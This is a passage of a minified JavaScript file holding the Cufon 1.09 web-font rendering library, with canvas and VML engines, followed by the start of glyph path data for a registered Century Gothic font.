/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface © The Monotype Corporation plc. Data © The Monotype Corporation plc /
 * Type Solutions Inc. 1990-91 All Rights Reserved
 * 
 * Trademark:
 * Century Gothic is a trademark of The Monotype Corporation plc.
 * 
 * Description:
 * A design based on Monotype 20th Century, which was drawn by Sol Hess between
 * 1936 and 1947. Century Gothic maintains the basic design of 20th Century but has
 * an enlarged 'x' height and has been modified to ensure satisfactory output from
 * modern digital systems. The design is influenced by the geometric style sans
 * serif faces which were popular during the 1920's and 30's. Useful for headlines
 * and general display work and for small quantities of text, particularly in
 * advertising.
 * 
 * Manufacturer:
 * Monotype Typography, Inc.
 * 
 * Designer:
 * Monotype Type Drawing Office
 * 
 * Vendor URL:
 * http://www.monotype.com/html/mtname/ms_welcome.html
 * 
 * License information:
 * http://www.monotype.com/html/type/license.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138","w":292},{"d":"198,-180r0,24r-178,0r0,-24r178,0xm198,-103r0,24r-178,0r0,-24r178,0","w":218},{"d":"51,-265r59,0r0,25r-34,0r0,286r34,0r0,24r-59,0r0,-335","w":126},{"d":"153,-265r6,0r0,180r31,0r0,25r-31,0r0,60r-26,0r0,-60r-124,0xm133,-85r0,-108r-76,108r76,0"},{"d":"21,-234r0,-25r137,0r-108,234r102,0r0,25r-142,0r109,-234r-98,0","w":172},{"d":"57,-281r39,54r-25,0r-51,-54r37,0","w":136},{"d":"147,-265r-107,300r-27,0r107,-300r27,0","w":157},{"d":"129,5v-36,-1,-59,-18,-76,-40r0,35r-24,0r0,-265r24,0r0,107v17,-23,41,-37,77,-38v54,-2,98,48,98,101v0,53,-45,101,-99,100xm52,-97v0,42,34,79,75,78v45,-1,76,-32,76,-77v0,-44,-31,-78,-75,-78v-44,0,-76,30,-76,77","w":245},{"d":"200,-61r0,26r-182,-83r0,-23r182,-82r0,25r-148,69","w":218},{"d":"111,-259r20,0r90,195r-23,0r-78,-168r-76,168r-23,0","w":241},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124","w":213},{"d":"108,-265r25,0r0,335r-25,0r0,-335","w":241},{"d":"31,-259r130,0r0,26r-104,0r0,81r104,0r0,25r-104,0r0,127r-26,0r0,-259","w":174},{"d":"2,-191r25,0r58,139r62,-139r4,0r61,139r60,-139r26,0r-83,191r-5,0r-61,-137r-61,137r-5,0","w":299},{"d":"75,70r-59,0r0,-25r35,0r0,-286r-35,0r0,-24r59,0r0,335","w":126},{"d":"18,-259r30,0r62,101r62,-101r30,0r-77,126r82,133r-30,0r-67,-108r-68,108r-30,0r83,-133","w":219},{"d":"18,-61r148,-68r-148,-69r0,-25r182,82r0,23r-182,83r0,-26","w":218},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266","w":235},{"d":"6,-233r0,-26r142,0r0,26r-58,0r0,233r-26,0r0,-233r-58,0","w":153},{"d":"175,-197v0,29,-16,43,-37,55v28,15,48,31,49,68v0,48,-37,81,-88,81v-51,0,-87,-35,-87,-79v0,-36,21,-55,50,-70v-22,-11,-38,-29,-38,-56v0,-39,34,-67,77,-67v42,0,74,28,74,68xm149,-198v0,-23,-20,-42,-49,-42v-26,0,-49,18,-49,43v-1,23,26,46,50,45v26,-2,48,-19,48,-46xm161,-74v0,-29,-29,-55,-60,-55v-34,0,-64,27,-63,58v1,33,27,53,62,53v35,1,61,-24,61,-56"},{"d":"111,-270v-46,84,-50,251,-9,345r-27,0v-39,-94,-36,-257,8,-345r28,0","w":132},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77","w":245},{"d":"17,-259r26,0r53,187r74,-187r5,0r74,187r53,-187r27,0r-74,259r-5,0r-77,-196r-78,196r-5,0","w":345},{"d":"195,-190v0,50,-35,70,-90,70r93,120r-32,0r-93,-120r-14,0r0,120r-26,0r0,-259v84,-2,162,-5,162,69xm168,-190v0,-49,-56,-44,-109,-43r0,88v53,1,109,5,109,-45","w":218},{"d":"187,-74v0,44,-37,75,-84,74r-71,0r0,-259v69,-3,134,0,134,64v0,26,-14,44,-33,54v32,11,54,28,54,67xm139,-195v1,-39,-40,-40,-82,-38r0,83v47,2,80,-5,82,-45xm160,-74v0,-47,-45,-52,-103,-50r0,99v55,2,103,-1,103,-49","w":206},{"d":"99,-184r-18,0r-4,-81r26,0xm31,-184r-19,0r-4,-81r26,0","w":111},{"d":"49,-262r25,0r0,71r39,0r0,21r-39,0r0,170r-25,0r0,-170r-34,0r0,-21r34,0r0,-71","w":121},{"d":"16,-250v0,-11,9,-20,20,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-11,0,-20,-10,-20,-21xm24,-191r25,0r0,191r-25,0r0,-191","w":72},{"d":"29,-41v36,34,87,33,87,-44r0,-174r26,0r0,175v15,96,-75,110,-127,63","w":173},{"d":"97,-240v-29,1,-39,16,-49,41r-27,0v8,-38,34,-64,76,-66v69,-4,103,88,41,120v26,9,48,37,48,68v0,71,-91,109,-144,64v-15,-13,-24,-31,-29,-56r25,0v8,32,25,49,60,50v35,1,62,-24,62,-56v0,-41,-29,-55,-76,-56r0,-24v32,-1,60,-12,60,-43v1,-24,-21,-43,-47,-42"},{"d":"50,-7v0,-44,-2,-64,-37,-68r0,-29v40,-4,37,-33,37,-81v0,-56,12,-76,65,-74r0,28v-29,0,-37,5,-36,36v0,63,1,86,-36,105v29,14,36,33,36,80v0,48,-7,62,36,62r0,27v-59,2,-65,-24,-65,-86","w":126},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77","w":235},{"d":"175,-202v-2,32,-19,42,-45,65r66,68v19,-16,19,-16,31,-27r18,19v-11,10,-22,19,-31,26r49,51r-36,0r-33,-35v-37,27,-49,42,-96,42v-37,0,-67,-25,-67,-60v0,-45,26,-56,63,-88v-20,-27,-34,-32,-34,-61v0,-64,118,-61,115,0xm117,-224v-21,0,-38,16,-28,35v6,10,15,21,25,33v18,-14,30,-26,35,-46v0,-14,-15,-22,-32,-22xm57,-55v1,29,39,47,70,32v14,-6,30,-17,49,-30r-65,-69v-31,26,-47,34,-54,67","w":272},{"d":"65,-265r23,0r-5,52r43,-31r11,20r-48,22r48,21r-11,20r-43,-30r5,52r-23,0r5,-52r-43,30r-12,-20r50,-21r-50,-22r12,-20r43,31","w":152},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-265r25,0r0,108v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173","w":219},{"d":"68,-265v49,9,106,12,154,-5r21,0r-189,288r-23,0r171,-262v-22,6,-52,7,-83,7v29,39,-4,94,-51,94v-33,0,-62,-28,-60,-61v1,-35,25,-60,60,-61xm108,-204v0,-20,-19,-39,-39,-39v-20,0,-39,19,-39,39v0,20,18,38,39,38v21,0,39,-18,39,-38xm149,-53v0,-33,28,-61,61,-61v33,0,61,28,61,61v0,33,-28,61,-61,61v-33,0,-61,-28,-61,-61xm249,-53v1,-20,-18,-39,-39,-39v-21,0,-38,18,-38,39v0,20,18,38,38,38v21,0,39,-18,39,-38","w":278},{"w":99},{"d":"43,0r-25,0r0,-191r25,0r0,28v15,-23,40,-43,72,-27r-13,21v-75,-15,-56,95,-59,169","w":108},{"d":"9,-191r27,0r63,139r64,-139r26,0r-87,191r-5,0"},{"d":"24,-265r24,0r0,265r-24,0r0,-265","w":72},{"d":"29,-197v0,-37,27,-58,64,-62r0,-18r23,0r0,19v26,6,39,15,53,36r-19,15v-9,-14,-20,-22,-34,-25r0,87v48,28,72,32,72,82v0,41,-28,65,-72,69r0,55r-23,0r0,-55v-41,-3,-63,-19,-80,-46r18,-14v16,22,37,34,62,36r0,-109v-40,-20,-64,-24,-64,-70xm93,-234v-31,0,-49,33,-31,58v6,9,17,16,31,22r0,-80xm116,-19v36,-2,62,-41,37,-71v-7,-9,-19,-17,-37,-27r0,98"},{"d":"18,-146v4,-55,72,-66,106,-24r-16,16v-21,-26,-62,-26,-68,7v7,45,84,41,84,96v0,59,-86,74,-115,29r16,-18v13,14,26,22,40,22v18,0,35,-14,35,-32v-4,-47,-86,-40,-82,-96","w":139},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259","w":193},{"d":"97,-141r0,-77r24,0r0,77r77,0r0,24r-77,0r0,76r-24,0r0,-76r-77,0r0,-24r77,0","w":218},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-191r25,0r0,34v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173","w":219},{"d":"102,-240v-37,0,-58,25,-60,62r-25,0v0,-50,38,-86,86,-87v60,-2,101,64,69,118v-21,36,-74,87,-105,122r119,0r0,25r-175,0r99,-107v29,-34,45,-39,48,-80v2,-29,-26,-54,-56,-53"},{"d":"45,-184r-18,0r-4,-81r26,0","w":71},{"d":"39,-191v-1,-42,-2,-81,39,-79v8,0,17,2,28,5r0,24v-23,-10,-47,-11,-42,24r0,26r40,0r0,21r-40,0r0,170r-25,0r0,-170r-25,0r0,-21r25,0","w":113},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101